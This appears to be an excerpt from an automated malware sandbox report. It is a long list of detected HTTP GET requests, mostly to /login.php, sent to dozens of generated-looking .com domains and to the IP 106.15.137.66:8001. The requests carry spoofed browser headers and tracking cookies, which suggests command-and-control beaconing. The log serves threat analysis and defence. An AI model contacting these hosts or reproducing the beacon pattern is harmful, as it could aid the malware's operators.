      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /dh/147287063_637385.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.137.66:8001Connection: Keep-AliveData Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galynuh.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyciz.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php?sub1=20240824-0247-3846-ad61-5b1f45bc95f4 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1724431658.5743798Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php?subid1=20240824-0247-3858-b174-cdc5f33d229c HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1724431658.5024510Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyhyg.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygyvuj.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyhiz.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comContent-Length: 6Cookie: btst=aa122ab46703e7e3b9d2518b0ebc8c78|8.46.123.33|1724431621|1724431621|0|1|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comContent-Length: 6Cookie: btst=3e0cadd8e2dc2fdcf92b9c2073c70c58|8.46.123.33|1724431621|1724431621|0|1|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyfyj.comContent-Length: 6Cookie: sid=5243bebf-616f-11ef-adb1-e1f00ce9ce88Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comContent-Length: 6Cookie: vsid=926vr471977221402211128Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comContent-Length: 6Cookie: btst=ee59b14dfaa9c8907c706ea22e956ef8|8.46.123.33|1724431621|1724431621|0|1|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comContent-Length: 6Cookie: btst=162891e75d1d854fb9d05e52998b5935|8.46.123.33|1724431621|1724431621|0|1|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: www.gahyqah.comConnection: Keep-AliveData Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupycag.comContent-Length: 6Cookie: btst=0e9c6b135bbf78b20bee3c60ff917523|8.46.123.33|1724431636|1724431636|0|1|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /dh/147287063_637385.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.137.66:8001Connection: Keep-AliveData Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /dh/147287063_637385.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.137.66:8001Connection: Keep-AliveData Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyciz.comContent-Length: 6Cookie: btst=e67e5bdc7da6809b4e043748c6ce58a1|8.46.123.33|1724431658|1724431658|0|1|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qexyhuv.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galynuh.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.comContent-Length: 6Cookie: __tad=1724431658.5743798Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.comContent-Length: 6Cookie: __tad=1724431658.5024510Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php?sub1=20240824-0248-364a-9808-e6df4ec839e7 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1724431658.5743798Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php?subid1=20240824-0248-365f-be38-e61788a8e181 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1724431658.5024510Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qexyhuv.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyhyg.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygyvuj.comContent-Length: 6Cookie: btst=230ba644e827e5eb69b76dd744835699|8.46.123.33|1724431667|1724431667|0|1|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyhiz.comContent-Length: 6Cookie: btst=61afe5b7d011093f87c495eec767f391|8.46.123.33|1724431669|1724431669|0|1|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comContent-Length: 6Cookie: btst=aa122ab46703e7e3b9d2518b0ebc8c78|8.46.123.33|1724431671|1724431621|25|2|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comContent-Length: 6Cookie: btst=ee59b14dfaa9c8907c706ea22e956ef8|8.46.123.33|1724431672|1724431621|25|2|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comContent-Length: 6Cookie: vsid=926vr471977221402211128Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comContent-Length: 6Cookie: btst=3e0cadd8e2dc2fdcf92b9c2073c70c58|8.46.123.33|1724431671|1724431621|25|2|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
